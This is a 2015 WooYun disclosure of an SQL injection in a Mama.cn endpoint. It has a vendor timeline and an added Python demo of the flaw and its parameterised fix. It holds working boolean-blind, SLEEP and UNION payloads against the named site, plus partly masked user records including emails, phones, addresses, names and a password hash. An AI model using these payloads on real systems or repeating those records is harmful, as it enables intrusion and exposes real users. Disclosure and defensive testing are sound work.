Vulnerability summary

Defect ID: wooyun-2015-0108536

Title: SQL injection on a Mama.cn (妈妈网) site leaks detailed data of nearly 1,000,000 users

Vendor: 妈妈网 (Mama.cn)

Author: 路人甲

Submitted: 2015-04-17 10:31

Fixed: 2015-06-01 14:06

Published: 2015-06-01 14:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Vulnerability details

Disclosure status:

2015-04-17: Details sent to the vendor, awaiting vendor action
2015-04-17: Vendor confirmed; details disclosed only to the vendor
2015-04-27: Details disclosed to core white hats and domain experts
2015-05-07: Details disclosed to regular white hats
2015-05-17: Details disclosed to intern white hats
2015-06-01: Details disclosed to the public

Brief description:

233

Detailed description:

http://try.mama.cn/do_ajax.php?area_id=2&do=area
Parameter: id (the area_id parameter)
12-2*5+0+0+1-1 returns TRUE
12-2*6+0+0+1-1 returns FALSE
2 AND 2+1-1-1=1 AND 380=380 returns TRUE
2 AND 3+1-1-1=1 AND 380=380 returns FALSE
This shows the vulnerability exists.
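The probe pairs above work because the server evaluates whatever arithmetic or boolean expression ends up in the WHERE clause: each pair differs only in one term, so a differing response proves the database did the arithmetic. The following is an added example, not code from the report or from the site, using a constructed SQLite table and a hypothetical area lookup: the string-interpolating version reproduces the report's TRUE/FALSE responses, the integer-validated, parameterised version rejects the probes before they reach SQL, and `arithmetic_oracle_present` is the regression check a maintainer can run against the fixed endpoint.

```python
import re
import sqlite3

# Constructed sample data: a hypothetical "area" table standing in for the
# site's real schema, which the report does not show.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE area (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO area VALUES (?, ?)",
                     [(1, "area-1"), (2, "area-2"), (3, "area-3")])
    return conn

def lookup_vulnerable(conn, area_id):
    # Interpolating the raw GET value makes it part of the SQL grammar, so
    # "12-2*5+0+0+1-1" evaluates to 2 and "2 AND 3+1-1-1=1" to false.
    sql = "SELECT name FROM area WHERE id = %s" % area_id
    return [row[0] for row in conn.execute(sql)]

def lookup_hardened(conn, area_id):
    # 1) validate the type before building any query: plain ASCII digits only;
    # 2) bind the value through a placeholder so it can only ever be data.
    if not isinstance(area_id, str) or not re.fullmatch(r"[0-9]{1,10}", area_id):
        raise ValueError("area_id must be a non-negative integer")
    return [row[0] for row in conn.execute(
        "SELECT name FROM area WHERE id = ?", (int(area_id),))]

# The TRUE/FALSE probe pairs from the report. Each pair differs only in an
# arithmetic term, so different responses mean the server did the arithmetic.
PROBE_PAIRS = [
    ("12-2*5+0+0+1-1", "12-2*6+0+0+1-1"),
    ("2 AND 2+1-1-1=1 AND 380=380", "2 AND 3+1-1-1=1 AND 380=380"),
]

def arithmetic_oracle_present(conn, lookup):
    """Regression check: True if the lookup still evaluates injected
    arithmetic, i.e. the responses to a TRUE/FALSE pair differ."""
    for true_probe, false_probe in PROBE_PAIRS:
        try:
            if lookup(conn, true_probe) != lookup(conn, false_probe):
                return True
        except ValueError:
            continue  # rejected before reaching SQL: no oracle on this pair
    return False

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", arithmetic_oracle_present(db, lookup_vulnerable))  # True
    print("hardened:  ", arithmetic_oracle_present(db, lookup_hardened))    # False
```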

Proof of vulnerability:

---
Parameter: area_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: area_id=2 AND 9680=9680&do=area
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: area_id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))LJBO)&do=area
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: area_id=2 UNION ALL SELECT CONCAT(0x7176626a71,0x7050487357756666456b,0x717a706b71),NULL,NULL,NULL-- &do=area
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.12
Database: try
[49 tables]
+-----------------------+
| spe_admin | 3 admin accounts
| syw_activity |
...
Database: try
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| syw_apply | 1348949 |
| syw_optionvars | 995365 |
| syw_user | 974296 | about 970,000
Table: syw_user
[10 entries]
+-----+---------+------------+-------------+-------------+------------------------+-------------+---------+---------+---------+---------+--------------------+---------+----------+----------------------------------+----------+----------+---------------+----------+------------+------------+-----------+------------+------------+-------------+-------------+
| id | city_id | discuz_uid | province_id | district_id | email | phone | handle | from | zipcode | updates | address | credits | baby_sex | password | is_start | is_daren | username | realname | add_time | lastvisit | baby_name | baby_birth | babystatus | active_time | update_time |
+-----+---------+------------+-------------+-------------+------------------------+-------------+---------+---------+---------+---------+--------------------+---------+----------+----------------------------------+----------+----------+---------------+----------+------------+------------+-----------+------------+------------+-------------+-------------+
| 401 | 455 | 5430025 | 20 | 0 | 3424**216@qq.com | 13802***81 | <blank> | <blank> | 510160 | 0 | 荔湾区**1B708 | 50 | 0 | e10adc3949ba***6e057f20f883e | 1 | 0 | lad**410216 | 钟** | 0 | 1312902368 | <blank> | 0000-00-00 | 0 | 0 | 0 |
| 400 | 455 | 5189049 | 20 | 0 | 5885**@qq.com | 137***815 | <blank> | <blank> | 501000 | 0 | 荔湾区石路** | 75 | 2 | e10adc3949b**e057f20f883e | 1 | 0 | 懒懒公主 | 周** | 0 | 13073***05 | 龚** | 2009-12-01 | 0 | 0 | 0 |
User names, phone numbers, home addresses, account passwords...

Remediation:

If this information leaks, there will be even more fraud cases, and users will suffer greater harm.
I hope the vendor takes this seriously.

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-04-17 14:05

Vendor reply:

Thanks

Latest status:

None yet